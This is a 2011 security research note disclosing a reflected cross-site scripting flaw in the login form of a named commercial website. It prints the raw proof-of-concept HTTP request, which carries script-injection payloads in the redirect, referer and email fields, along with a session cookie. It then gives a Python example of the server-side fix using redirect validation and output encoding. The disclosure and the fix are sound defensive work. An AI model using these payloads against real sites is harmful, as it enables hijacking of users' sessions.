XSS.CX Research Note | April 18, 2011 @ 2000 US Eastern

XSS is confirmed throughout the site. This listing is specific to the login form being vulnerable to XSS. The HTTP request below is the actual proof of concept used to test and confirm the XSS vulnerability. A retest is available at any time; let us know if we can help.

===================================================================================================================

POST /users/action/login HTTP/1.1
Host: www.viglink.com
Connection: keep-alive
Referer: http://www.viglink.com/users/login?_ek=yp&ar=/users/action%3F%22onmouseover%3Dprompt(947209)%3E5698e%3Cscript%3Ealert(document.cookie)%3C/script%3Ece99c61ebc1
Content-Length: 214
Cache-Control: max-age=0
Origin: http://www.viglink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Referrer.p=12412; vglnk.Agent.p=9575d1dc8a75bde845888cc1edb03cf2; __utmz=54157999.1303153867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=A823B29B187609CC7FB2AB037A3C7339; __utma=54157999.1214478760.1303153867.1303153867.1303170631.2; __utmc=54157999; __utmb=54157999.1.10.1303170631

authRedirect=%2Fusers%2Faction%3F%22onmouseover%3Dprompt%28947209%29%3E5698e%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ece99c61ebc1&email=2b08d">c0fa7bd59e7&password=
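As an added example (not code from the XSS.CX note or from the site itself), this is the server-side fix a defender would apply at the two reflection points visible in the request body, authRedirect and email: constrain the redirect target to a same-site path and HTML-attribute-encode every value reflected into the login form. Python is assumed; the field names and sample values are taken from the request above.

```python
import html
from urllib.parse import parse_qsl, quote, urlencode, urlsplit, urlunsplit


def canonical_redirect(raw: str, default: str = "/") -> str:
    """Return a same-site path for the post-login redirect, or `default`.

    Anything carrying a scheme or host (https://host/, //host/, javascript:)
    is rejected so the field cannot become an open redirect. The path and
    query are then re-serialized, which percent-encodes quotes, angle
    brackets and parentheses instead of passing them through verbatim.
    """
    parts = urlsplit(raw)
    if parts.scheme or parts.netloc:
        return default
    if not parts.path.startswith("/") or parts.path.startswith("//"):
        return default
    path = quote(parts.path, safe="/")
    query = urlencode(parse_qsl(parts.query, keep_blank_values=True))
    return urlunsplit(("", "", path, query, ""))


def render_input(input_type: str, name: str, value: str) -> str:
    """Reflect a value into an <input> with HTML attribute encoding.

    html.escape(quote=True) turns & < > " ' into entities, so a value such
    as 2b08d">c0fa7bd59e7 can no longer close the attribute and the tag.
    """
    return '<input type="{}" name="{}" value="{}">'.format(
        html.escape(input_type, quote=True),
        html.escape(name, quote=True),
        html.escape(value, quote=True),
    )


def render_login_form(auth_redirect: str, email: str) -> str:
    """Login form with both reflected fields passed through the two guards."""
    return "\n".join([
        '<form method="POST" action="/users/action/login">',
        render_input("hidden", "authRedirect", canonical_redirect(auth_redirect)),
        render_input("text", "email", email),
        "</form>",
    ])


if __name__ == "__main__":
    # Values as submitted in the proof-of-concept request above (URL-decoded).
    poc_redirect = '/users/action?"onmouseover=prompt(947209)>5698e<script>alert(document.cookie)</script>ce99c61ebc1'
    print(render_login_form(poc_redirect, '2b08d">c0fa7bd59e7'))
```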